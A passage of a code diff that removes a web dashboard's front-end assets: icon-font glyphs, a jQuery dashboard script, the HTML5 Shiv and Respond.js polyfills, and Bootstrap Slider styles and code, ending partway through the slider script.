-<glyph unicode="&#xf18c;" horiz-adv-x="1408" d="M1402 433q-32 -80 -76 -138t-91 -88.5t-99 -46.5t-101.5 -14.5t-96.5 8.5t-86.5 22t-69.5 27.5t-46 22.5l-17 10q-113 -228 -289.5 -359.5t-384.5 -132.5q-19 0 -32 13t-13 32t13 31.5t32 12.5q173 1 322.5 107.5t251.5 294.5q-36 -14 -72 -23t-83 -13t-91 2.5t-93 28.5 t-92 59t-84.5 100t-74.5 146q114 47 214 57t167.5 -7.5t124.5 -56.5t88.5 -77t56.5 -82q53 131 79 291q-7 -1 -18 -2.5t-46.5 -2.5t-69.5 0.5t-81.5 10t-88.5 23t-84 42.5t-75 65t-54.5 94.5t-28.5 127.5q70 28 133.5 36.5t112.5 -1t92 -30t73.5 -50t56 -61t42 -63t27.5 -56 t16 -39.5l4 -16q12 122 12 195q-8 6 -21.5 16t-49 44.5t-63.5 71.5t-54 93t-33 112.5t12 127t70 138.5q73 -25 127.5 -61.5t84.5 -76.5t48 -85t20.5 -89t-0.5 -85.5t-13 -76.5t-19 -62t-17 -42l-7 -15q1 -5 1 -50.5t-1 -71.5q3 7 10 18.5t30.5 43t50.5 58t71 55.5t91.5 44.5 t112 14.5t132.5 -24q-2 -78 -21.5 -141.5t-50 -104.5t-69.5 -71.5t-81.5 -45.5t-84.5 -24t-80 -9.5t-67.5 1t-46.5 4.5l-17 3q-23 -147 -73 -283q6 7 18 18.5t49.5 41t77.5 52.5t99.5 42t117.5 20t129 -23.5t137 -77.5z" />
-<glyph unicode="&#xf18d;" horiz-adv-x="1280" d="M1259 283v-66q0 -85 -57.5 -144.5t-138.5 -59.5h-57l-260 -269v269h-529q-81 0 -138.5 59.5t-57.5 144.5v66h1238zM1259 609v-255h-1238v255h1238zM1259 937v-255h-1238v255h1238zM1259 1077v-67h-1238v67q0 84 57.5 143.5t138.5 59.5h846q81 0 138.5 -59.5t57.5 -143.5z " />
-<glyph unicode="&#xf18e;" d="M1152 640q0 -14 -9 -23l-320 -320q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5v192h-352q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h352v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198 t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf190;" d="M1152 736v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-352v-192q0 -14 -9 -23t-23 -9q-12 0 -24 10l-319 319q-9 9 -9 23t9 23l320 320q9 9 23 9q13 0 22.5 -9.5t9.5 -22.5v-192h352q13 0 22.5 -9.5t9.5 -22.5zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198 t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf191;" d="M1024 960v-640q0 -26 -19 -45t-45 -19q-20 0 -37 12l-448 320q-27 19 -27 52t27 52l448 320q17 12 37 12q26 0 45 -19t19 -45zM1280 160v960q0 13 -9.5 22.5t-22.5 9.5h-960q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5z M1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf192;" d="M1024 640q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181zM768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5 t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf193;" horiz-adv-x="1664" d="M1023 349l102 -204q-58 -179 -210 -290t-339 -111q-156 0 -288.5 77.5t-210 210t-77.5 288.5q0 181 104.5 330t274.5 211l17 -131q-122 -54 -195 -165.5t-73 -244.5q0 -185 131.5 -316.5t316.5 -131.5q126 0 232.5 65t165 175.5t49.5 236.5zM1571 249l58 -114l-256 -128 q-13 -7 -29 -7q-40 0 -57 35l-239 477h-472q-24 0 -42.5 16.5t-21.5 40.5l-96 779q-2 16 6 42q14 51 57 82.5t97 31.5q66 0 113 -47t47 -113q0 -69 -52 -117.5t-120 -41.5l37 -289h423v-128h-407l16 -128h455q40 0 57 -35l228 -455z" />
-<glyph unicode="&#xf194;" d="M1254 899q16 85 -21 132q-52 65 -187 45q-17 -3 -41 -12.5t-57.5 -30.5t-64.5 -48.5t-59.5 -70t-44.5 -91.5q80 7 113.5 -16t26.5 -99q-5 -52 -52 -143q-43 -78 -71 -99q-44 -32 -87 14q-23 24 -37.5 64.5t-19 73t-10 84t-8.5 71.5q-23 129 -34 164q-12 37 -35.5 69 t-50.5 40q-57 16 -127 -25q-54 -32 -136.5 -106t-122.5 -102v-7q16 -8 25.5 -26t21.5 -20q21 -3 54.5 8.5t58 10.5t41.5 -30q11 -18 18.5 -38.5t15 -48t12.5 -40.5q17 -46 53 -187q36 -146 57 -197q42 -99 103 -125q43 -12 85 -1.5t76 31.5q131 77 250 237 q104 139 172.5 292.5t82.5 226.5zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf195;" horiz-adv-x="1152" d="M1152 704q0 -191 -94.5 -353t-256.5 -256.5t-353 -94.5h-160q-14 0 -23 9t-9 23v611l-215 -66q-3 -1 -9 -1q-10 0 -19 6q-13 10 -13 26v128q0 23 23 31l233 71v93l-215 -66q-3 -1 -9 -1q-10 0 -19 6q-13 10 -13 26v128q0 23 23 31l233 71v250q0 14 9 23t23 9h160 q14 0 23 -9t9 -23v-181l375 116q15 5 28 -5t13 -26v-128q0 -23 -23 -31l-393 -121v-93l375 116q15 5 28 -5t13 -26v-128q0 -23 -23 -31l-393 -121v-487q188 13 318 151t130 328q0 14 9 23t23 9h160q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf196;" horiz-adv-x="1408" d="M1152 736v-64q0 -14 -9 -23t-23 -9h-352v-352q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v352h-352q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h352v352q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-352h352q14 0 23 -9t9 -23zM1280 288v832q0 66 -47 113t-113 47h-832 q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113zM1408 1120v-832q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf197;" horiz-adv-x="1792" />
-<glyph unicode="&#xf198;" horiz-adv-x="1792" />
-<glyph unicode="&#xf199;" horiz-adv-x="1792" />
-<glyph unicode="&#xf19a;" horiz-adv-x="1792" />
-<glyph unicode="&#xf19b;" horiz-adv-x="1792" />
-<glyph unicode="&#xf19c;" horiz-adv-x="1792" />
-<glyph unicode="&#xf19d;" horiz-adv-x="1792" />
-<glyph unicode="&#xf19e;" horiz-adv-x="1792" />
-<glyph unicode="&#xf500;" horiz-adv-x="1792" />
-</font>
-</defs></svg> 

newDesign/assets/js/application.js

@@ -1,219 +0,0 @@
-var app = function() {
-
-    var init = function() {
-
-        tooltips();
-        toggleMenuLeft();
-        toggleMenuRight();
-        menu();
-        togglePanel();
-        closePanel();
-    };
-
-    var tooltips = function() {
-        $('#toggle-left').tooltip();
-    };
-
-    var togglePanel = function() {
-        $('.actions > .fa-chevron-down').click(function() {
-            $(this).parent().parent().next().slideToggle('fast');
-            $(this).toggleClass('fa-chevron-down fa-chevron-up');
-        });
-
-    };
-
-    var toggleMenuLeft = function() {
-        $('#toggle-left').bind('click', function(e) {
-            if (!$('.sidebarRight').hasClass('.sidebar-toggle-right')) {
-                $('.sidebarRight').removeClass('sidebar-toggle-right');
-                $('.main-content-wrapper').removeClass('main-content-toggle-right');
-            }
-            $('.sidebar').toggleClass('sidebar-toggle');
-            $('.main-content-wrapper').toggleClass('main-content-toggle-left');
-            e.stopPropagation();
-        });
-    };
-
-    var toggleMenuRight = function() {
-        $('#toggle-right').bind('click', function(e) {
-
-            if (!$('.sidebar').hasClass('.sidebar-toggle')) {
-                $('.sidebar').addClass('sidebar-toggle');
-                $('.main-content-wrapper').addClass('main-content-toggle-left');
-            }
-            
-            $('.sidebarRight').toggleClass('sidebar-toggle-right animated bounceInRight');
-            $('.main-content-wrapper').toggleClass('main-content-toggle-right');
-
-            if ( $(window).width() < 660 ) {
-                $('.sidebar').removeClass('sidebar-toggle');
-                $('.main-content-wrapper').removeClass('main-content-toggle-left main-content-toggle-right');
-             };
-
-            e.stopPropagation();
-        });
-    };
-
-    var closePanel = function() {
-        $('.actions > .fa-times').click(function() {
-            $(this).parent().parent().parent().fadeOut();
-        });
-
-    }
-
-    var menu = function() {
-        $("#leftside-navigation .sub-menu > a").click(function(e) {
-            $("#leftside-navigation ul ul").slideUp();
-            if (!$(this).next().is(":visible")) {
-                $(this).next().slideDown();
-            }
-              e.stopPropagation();
-        });
-    };
-    //End functions
-
-    //Dashboard functions
-    var timer = function() {
-        $('.timer').countTo();
-    };
-
-
-    //Vector Maps 
-    var map = function() {
-        $('#map').vectorMap({
-            map: 'world_mill_en',
-            backgroundColor: 'transparent',
-            regionStyle: {
-                initial: {
-                    fill: '#1ABC9C',
-                },
-                hover: {
-                    "fill-opacity": 0.8
-                }
-            },
-            markerStyle: {
-                initial: {
-                    r: 10
-                },
-                hover: {
-                    r: 12,
-                    stroke: 'rgba(255,255,255,0.8)',
-                    "stroke-width": 3
-                }
-            },
-            markers: [{
-                latLng: [27.9881, 86.9253],
-                name: '36 Employees',
-                style: {
-                    fill: '#E84C3D',
-                    stroke: 'rgba(255,255,255,0.7)',
-                    "stroke-width": 3
-                }
-            }, {
-                latLng: [48.8582, 2.2945],
-                name: '58 Employees',
-                style: {
-                    fill: '#E84C3D',
-                    stroke: 'rgba(255,255,255,0.7)',
-                    "stroke-width": 3
-                }
-            }, {
-                latLng: [-40.6892, -74.0444],
-                name: '109 Employees',
-                style: {
-                    fill: '#E84C3D',
-                    stroke: 'rgba(255,255,255,0.7)',
-                    "stroke-width": 3
-                }
-            }, {
-                latLng: [34.05, -118.25],
-                name: '85 Employees ',
-                style: {
-                    fill: '#E84C3D',
-                    stroke: 'rgba(255,255,255,0.7)',
-                    "stroke-width": 3
-                }
-            }]
-        });
-
-    };
-
-    var weather = function() {
-        var icons = new Skycons({
-            "color": "white"
-        });
-
-        icons.set("clear-day", Skycons.CLEAR_DAY);
-        icons.set("clear-night", Skycons.CLEAR_NIGHT);
-        icons.set("partly-cloudy-day", Skycons.PARTLY_CLOUDY_DAY);
-        icons.set("partly-cloudy-night", Skycons.PARTLY_CLOUDY_NIGHT);
-        icons.set("cloudy", Skycons.CLOUDY);
-        icons.set("rain", Skycons.RAIN);
-        icons.set("sleet", Skycons.SLEET);
-        icons.set("snow", Skycons.SNOW);
-        icons.set("wind", Skycons.WIND);
-        icons.set("fog", Skycons.FOG);
-
-        icons.play();
-    }
-
-    //morris pie chart
-    var morrisPie = function() {
-
-        Morris.Donut({
-            element: 'donut-example',
-            data: [{
-                    label: "Chrome",
-                    value: 73
-                }, {
-                    label: "Firefox",
-                    value: 71
-                }, {
-                    label: "Safari",
-                    value: 69
-                }, {
-                    label: "Internet Explorer",
-                    value: 40
-                }, {
-                    label: "Opera",
-                    value: 20
-                }, {
-                    label: "Android Browser",
-                    value: 10
-                }
-
-            ],
-            colors: [
-                '#1abc9c',
-                '#293949',
-                '#e84c3d',
-                '#3598db',
-                '#2dcc70',
-                '#f1c40f'
-            ]
-        });
-    }
-
-    //Sliders
-    var sliders = function() {
-        $('.slider-span').slider()
-    };
-
-
-    //return functions
-    return {
-        init: init,
-        timer: timer,
-        map: map,
-        sliders: sliders,
-        weather: weather,
-        morrisPie: morrisPie
-
-    };
-}();
-
-//Load global functions
-$(document).ready(function() {
-    app.init();
-
-});

newDesign/assets/js/html5shiv.js

@@ -1,8 +0,0 @@
-/*
- HTML5 Shiv v3.7.0 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed
-*/
-(function(l,f){function m(){var a=e.elements;return"string"==typeof a?a.split(" "):a}function i(a){var b=n[a[o]];b||(b={},h++,a[o]=h,n[h]=b);return b}function p(a,b,c){b||(b=f);if(g)return b.createElement(a);c||(c=i(b));b=c.cache[a]?c.cache[a].cloneNode():r.test(a)?(c.cache[a]=c.createElem(a)).cloneNode():c.createElem(a);return b.canHaveChildren&&!s.test(a)?c.frag.appendChild(b):b}function t(a,b){if(!b.cache)b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag();
-a.createElement=function(c){return!e.shivMethods?b.createElem(c):p(c,a,b)};a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+m().join().replace(/[\w\-]+/g,function(a){b.createElem(a);b.frag.createElement(a);return'c("'+a+'")'})+");return n}")(e,b.frag)}function q(a){a||(a=f);var b=i(a);if(e.shivCSS&&!j&&!b.hasCSS){var c,d=a;c=d.createElement("p");d=d.getElementsByTagName("head")[0]||d.documentElement;c.innerHTML="x<style>article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}</style>";
-c=d.insertBefore(c.lastChild,d.firstChild);b.hasCSS=!!c}g||t(a,b);return a}var k=l.html5||{},s=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,r=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,j,o="_html5shiv",h=0,n={},g;(function(){try{var a=f.createElement("a");a.innerHTML="<xyz></xyz>";j="hidden"in a;var b;if(!(b=1==a.childNodes.length)){f.createElement("a");var c=f.createDocumentFragment();b="undefined"==typeof c.cloneNode||
-"undefined"==typeof c.createDocumentFragment||"undefined"==typeof c.createElement}g=b}catch(d){g=j=!0}})();var e={elements:k.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output progress section summary template time video",version:"3.7.0",shivCSS:!1!==k.shivCSS,supportsUnknownElements:g,shivMethods:!1!==k.shivMethods,type:"default",shivDocument:q,createElement:p,createDocumentFragment:function(a,b){a||(a=f);
-if(g)return a.createDocumentFragment();for(var b=b||i(a),c=b.frag.cloneNode(),d=0,e=m(),h=e.length;d<h;d++)c.createElement(e[d]);return c}};l.html5=e;q(f)})(this,document);

newDesign/assets/js/respond.min.js

@@ -1,5 +0,0 @@
-/*! Respond.js v1.4.2: min/max-width media query polyfill * Copyright 2013 Scott Jehl
- * Licensed under https://github.com/scottjehl/Respond/blob/master/LICENSE-MIT
- *  */
-
-!function(a){"use strict";a.matchMedia=a.matchMedia||function(a){var b,c=a.documentElement,d=c.firstElementChild||c.firstChild,e=a.createElement("body"),f=a.createElement("div");return f.id="mq-test-1",f.style.cssText="position:absolute;top:-100em",e.style.background="none",e.appendChild(f),function(a){return f.innerHTML='&shy;<style media="'+a+'"> #mq-test-1 { width: 42px; }</style>',c.insertBefore(e,d),b=42===f.offsetWidth,c.removeChild(e),{matches:b,media:a}}}(a.document)}(this),function(a){"use strict";function b(){u(!0)}var c={};a.respond=c,c.update=function(){};var d=[],e=function(){var b=!1;try{b=new a.XMLHttpRequest}catch(c){b=new a.ActiveXObject("Microsoft.XMLHTTP")}return function(){return b}}(),f=function(a,b){var c=e();c&&(c.open("GET",a,!0),c.onreadystatechange=function(){4!==c.readyState||200!==c.status&&304!==c.status||b(c.responseText)},4!==c.readyState&&c.send(null))};if(c.ajax=f,c.queue=d,c.regex={media:/@media[^\{]+\{([^\{\}]*\{[^\}\{]*\})+/gi,keyframes:/@(?:\-(?:o|moz|webkit)\-)?keyframes[^\{]+\{(?:[^\{\}]*\{[^\}\{]*\})+[^\}]*\}/gi,urls:/(url\()['"]?([^\/\)'"][^:\)'"]+)['"]?(\))/g,findStyles:/@media *([^\{]+)\{([\S\s]+?)$/,only:/(only\s+)?([a-zA-Z]+)\s?/,minw:/\([\s]*min\-width\s*:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/,maxw:/\([\s]*max\-width\s*:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/},c.mediaQueriesSupported=a.matchMedia&&null!==a.matchMedia("only all")&&a.matchMedia("only all").matches,!c.mediaQueriesSupported){var g,h,i,j=a.document,k=j.documentElement,l=[],m=[],n=[],o={},p=30,q=j.getElementsByTagName("head")[0]||k,r=j.getElementsByTagName("base")[0],s=q.getElementsByTagName("link"),t=function(){var a,b=j.createElement("div"),c=j.body,d=k.style.fontSize,e=c&&c.style.fontSize,f=!1;return b.style.cssText="position:absolute;font-size:1em;width:1em",c||(c=f=j.createElement("body"),c.style.background="none"),k.style.fontSize="100%",c.style.fontSize="100%",c.appendChild(b),f&&k.insertBefore(c,k.firstChild),a=b.offsetWidth,f?k.removeChild(c):c.removeChild(b),k.style.fontSize=d,e&&(c.style.fontSize=e),a=i=parseFloat(a)},u=function(b){var c="clientWidth",d=k[c],e="CSS1Compat"===j.compatMode&&d||j.body[c]||d,f={},o=s[s.length-1],r=(new Date).getTime();if(b&&g&&p>r-g)return a.clearTimeout(h),h=a.setTimeout(u,p),void 0;g=r;for(var v in l)if(l.hasOwnProperty(v)){var w=l[v],x=w.minw,y=w.maxw,z=null===x,A=null===y,B="em";x&&(x=parseFloat(x)*(x.indexOf(B)>-1?i||t():1)),y&&(y=parseFloat(y)*(y.indexOf(B)>-1?i||t():1)),w.hasquery&&(z&&A||!(z||e>=x)||!(A||y>=e))||(f[w.media]||(f[w.media]=[]),f[w.media].push(m[w.rules]))}for(var C in n)n.hasOwnProperty(C)&&n[C]&&n[C].parentNode===q&&q.removeChild(n[C]);n.length=0;for(var D in f)if(f.hasOwnProperty(D)){var E=j.createElement("style"),F=f[D].join("\n");E.type="text/css",E.media=D,q.insertBefore(E,o.nextSibling),E.styleSheet?E.styleSheet.cssText=F:E.appendChild(j.createTextNode(F)),n.push(E)}},v=function(a,b,d){var e=a.replace(c.regex.keyframes,"").match(c.regex.media),f=e&&e.length||0;b=b.substring(0,b.lastIndexOf("/"));var g=function(a){return a.replace(c.regex.urls,"$1"+b+"$2$3")},h=!f&&d;b.length&&(b+="/"),h&&(f=1);for(var i=0;f>i;i++){var j,k,n,o;h?(j=d,m.push(g(a))):(j=e[i].match(c.regex.findStyles)&&RegExp.$1,m.push(RegExp.$2&&g(RegExp.$2))),n=j.split(","),o=n.length;for(var p=0;o>p;p++)k=n[p],l.push({media:k.split("(")[0].match(c.regex.only)&&RegExp.$2||"all",rules:m.length-1,hasquery:k.indexOf("(")>-1,minw:k.match(c.regex.minw)&&parseFloat(RegExp.$1)+(RegExp.$2||""),maxw:k.match(c.regex.maxw)&&parseFloat(RegExp.$1)+(RegExp.$2||"")})}u()},w=function(){if(d.length){var b=d.shift();f(b.href,function(c){v(c,b.href,b.media),o[b.href]=!0,a.setTimeout(function(){w()},0)})}},x=function(){for(var b=0;b<s.length;b++){var c=s[b],e=c.href,f=c.media,g=c.rel&&"stylesheet"===c.rel.toLowerCase();e&&g&&!o[e]&&(c.styleSheet&&c.styleSheet.rawCssText?(v(c.styleSheet.rawCssText,e,f),o[e]=!0):(!/^([a-zA-Z:]*\/\/)/.test(e)&&!r||e.replace(RegExp.$1,"").split("/")[0]===a.location.host)&&("//"===e.substring(0,2)&&(e=a.location.protocol+e),d.push({href:e,media:f})))}w()};x(),c.update=x,c.getEmValue=t,a.addEventListener?a.addEventListener("resize",b,!1):a.attachEvent&&a.attachEvent("onresize",b)}}(this);

newDesign/assets/plugins/bootstrap-slider/css/slider.css

@@ -1,138 +0,0 @@
-/*!
- * Slider for Bootstrap
- *
- * Copyright 2012 Stefan Petre
- * Licensed under the Apache License v2.0
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- */
-.slider {
-  display: inline-block;
-  vertical-align: middle;
-  position: relative;
-}
-.slider.slider-horizontal {
-  width: 210px;
-  height: 20px;
-}
-.slider.slider-horizontal .slider-track {
-  height: 10px;
-  width: 100%;
-  margin-top: -5px;
-  top: 50%;
-  left: 0;
-}
-.slider.slider-horizontal .slider-selection {
-  height: 100%;
-  top: 0;
-  bottom: 0;
-}
-.slider.slider-horizontal .slider-handle {
-  margin-left: -10px;
-  margin-top: -5px;
-}
-.slider.slider-horizontal .slider-handle.triangle {
-  border-width: 0 10px 10px 10px;
-  width: 0;
-  height: 0;
-  border-bottom-color: #0480be;
-  margin-top: 0;
-}
-.slider.slider-vertical {
-  height: 210px;
-  width: 20px;
-}
-.slider.slider-vertical .slider-track {
-  width: 10px;
-  height: 100%;
-  margin-left: -5px;
-  left: 50%;
-  top: 0;
-}
-.slider.slider-vertical .slider-selection {
-  width: 100%;
-  left: 0;
-  top: 0;
-  bottom: 0;
-}
-.slider.slider-vertical .slider-handle {
-  margin-left: -5px;
-  margin-top: -10px;
-}
-.slider.slider-vertical .slider-handle.triangle {
-  border-width: 10px 0 10px 10px;
-  width: 1px;
-  height: 1px;
-  border-left-color: #0480be;
-  margin-left: 0;
-}
-.slider input {
-  display: none;
-}
-.slider .tooltip-inner {
-  white-space: nowrap;
-}
-.slider-track {
-  position: absolute;
-  cursor: pointer;
-  background-color: #f7f7f7;
-  background-image: -moz-linear-gradient(top, #f5f5f5, #f9f9f9);
-  background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f5f5f5), to(#f9f9f9));
-  background-image: -webkit-linear-gradient(top, #f5f5f5, #f9f9f9);
-  background-image: -o-linear-gradient(top, #f5f5f5, #f9f9f9);
-  background-image: linear-gradient(to bottom, #f5f5f5, #f9f9f9);
-  background-repeat: repeat-x;
-  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff5f5f5', endColorstr='#fff9f9f9', GradientType=0);
-  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
-  -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
-  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
-  -webkit-border-radius: 4px;
-  -moz-border-radius: 4px;
-  border-radius: 4px;
-}
-.slider-selection {
-  position: absolute;
-  background-color: #f7f7f7;
-  background-image: -moz-linear-gradient(top, #f9f9f9, #f5f5f5);
-  background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f9f9f9), to(#f5f5f5));
-  background-image: -webkit-linear-gradient(top, #f9f9f9, #f5f5f5);
-  background-image: -o-linear-gradient(top, #f9f9f9, #f5f5f5);
-  background-image: linear-gradient(to bottom, #f9f9f9, #f5f5f5);
-  background-repeat: repeat-x;
-  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff9f9f9', endColorstr='#fff5f5f5', GradientType=0);
-  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
-  -moz-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
-  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
-  -webkit-box-sizing: border-box;
-  -moz-box-sizing: border-box;
-  box-sizing: border-box;
-  -webkit-border-radius: 4px;
-  -moz-border-radius: 4px;
-  border-radius: 4px;
-}
-.slider-handle {
-  position: absolute;
-  width: 20px;
-  height: 20px;
-  background-color: #0e90d2;
-  background-image: -moz-linear-gradient(top, #149bdf, #0480be);
-  background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#149bdf), to(#0480be));
-  background-image: -webkit-linear-gradient(top, #149bdf, #0480be);
-  background-image: -o-linear-gradient(top, #149bdf, #0480be);
-  background-image: linear-gradient(to bottom, #149bdf, #0480be);
-  background-repeat: repeat-x;
-  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff149bdf', endColorstr='#ff0480be', GradientType=0);
-  -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
-  -moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
-  box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
-  opacity: 0.8;
-  border: 0px solid transparent;
-}
-.slider-handle.round {
-  -webkit-border-radius: 20px;
-  -moz-border-radius: 20px;
-  border-radius: 20px;
-}
-.slider-handle.triangle {
-  background: transparent none;
-}

newDesign/assets/plugins/bootstrap-slider/js/bootstrap-slider.js

@@ -1,388 +0,0 @@
-/* =========================================================
- * bootstrap-slider.js v2.0.0
- * http://www.eyecon.ro/bootstrap-slider
- * =========================================================
- * Copyright 2012 Stefan Petre
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- * ========================================================= */
- 
-!function( $ ) {
-
-	var Slider = function(element, options) {
-		this.element = $(element);
-		this.picker = $('<div class="slider">'+
-							'<div class="slider-track">'+
-								'<div class="slider-selection"></div>'+
-								'<div class="slider-handle"></div>'+
-								'<div class="slider-handle"></div>'+
-							'</div>'+
-							'<div class="tooltip"><div class="tooltip-arrow"></div><div class="tooltip-inner"></div></div>'+
-						'</div>')
-							.insertBefore(this.element)
-							.append(this.element);
-		this.id = this.element.data('slider-id')||options.id;
-		if (this.id) {
-			this.picker[0].id = this.id;
-		}
-
-		if (typeof Modernizr !== 'undefined' && Modernizr.touch) {
-			this.touchCapable = true;
-		}
-
-		var tooltip = this.element.data('slider-tooltip')||options.tooltip;
-
-		this.tooltip = this.picker.find('.tooltip');
-		this.tooltipInner = this.tooltip.find('div.tooltip-inner');
-
-		this.orientation = this.element.data('slider-orientation')||options.orientation;
-		switch(this.orientation) {
-			case 'vertical':
-				this.picker.addClass('slider-vertical');
-				this.stylePos = 'top';
-				this.mousePos = 'pageY';
-				this.sizePos = 'offsetHeight';
-				this.tooltip.addClass('right')[0].style.left = '100%';
-				break;
-			default:
-				this.picker
-					.addClass('slider-horizontal')
-					.css('width', this.element.outerWidth());
-				this.orientation = 'horizontal';
-				this.stylePos = 'left';
-				this.mousePos = 'pageX';
-				this.sizePos = 'offsetWidth';
-				this.tooltip.addClass('top')[0].style.top = -this.tooltip.outerHeight() - 14 + 'px';
-				break;
-		}
-
-		this.min = this.element.data('slider-min')||options.min;
-		this.max = this.element.data('slider-max')||options.max;
-		this.step = this.element.data('slider-step')||options.step;
-		this.value = this.element.data('slider-value')||options.value;
-		if (this.value[1]) {
-			this.range = true;
-		}
-
-		this.selection = this.element.data('slider-selection')||options.selection;
-		this.selectionEl = this.picker.find('.slider-selection');
-		if (this.selection === 'none') {
-			this.selectionEl.addClass('hide');
-		}
-		this.selectionElStyle = this.selectionEl[0].style;
-
-
-		this.handle1 = this.picker.find('.slider-handle:first');
-		this.handle1Stype = this.handle1[0].style;
-		this.handle2 = this.picker.find('.slider-handle:last');
-		this.handle2Stype = this.handle2[0].style;
-
-		var handle = this.element.data('slider-handle')||options.handle;
-		switch(handle) {
-			case 'round':
-				this.handle1.addClass('round');
-				this.handle2.addClass('round');
-				break
-			case 'triangle':
-				this.handle1.addClass('triangle');
-				this.handle2.addClass('triangle');
-				break
-		}
-
-		if (this.range) {
-			this.value[0] = Math.max(this.min, Math.min(this.max, this.value[0]));
-			this.value[1] = Math.max(this.min, Math.min(this.max, this.value[1]));
-		} else {
-			this.value = [ Math.max(this.min, Math.min(this.max, this.value))];
-			this.handle2.addClass('hide');
-			if (this.selection == 'after') {
-				this.value[1] = this.max;
-			} else {
-				this.value[1] = this.min;
-			}
-		}
-		this.diff = this.max - this.min;
-		this.percentage = [
-			(this.value[0]-this.min)*100/this.diff,
-			(this.value[1]-this.min)*100/this.diff,
-			this.step*100/this.diff
-		];
-
-		this.offset = this.picker.offset();
-		this.size = this.picker[0][this.sizePos];
-
-		this.formater = options.formater;
-
-		this.layout();
-
-		if (this.touchCapable) {
-			// Touch: Bind touch events:
-			this.picker.on({
-				touchstart: $.proxy(this.mousedown, this)
-			});
-		} else {
-			this.picker.on({
-				mousedown: $.proxy(this.mousedown, this)
-			});
-		}
-
-		if (tooltip === 'show') {
-			this.picker.on({
-				mouseenter: $.proxy(this.showTooltip, this),
-				mouseleave: $.proxy(this.hideTooltip, this)
-			});
-		} else {
-			this.tooltip.addClass('hide');
-		}
-	};
-
-	Slider.prototype = {
-		constructor: Slider,
-
-		over: false,
-		inDrag: false,
-		
-		showTooltip: function(){
-			this.tooltip.addClass('in');
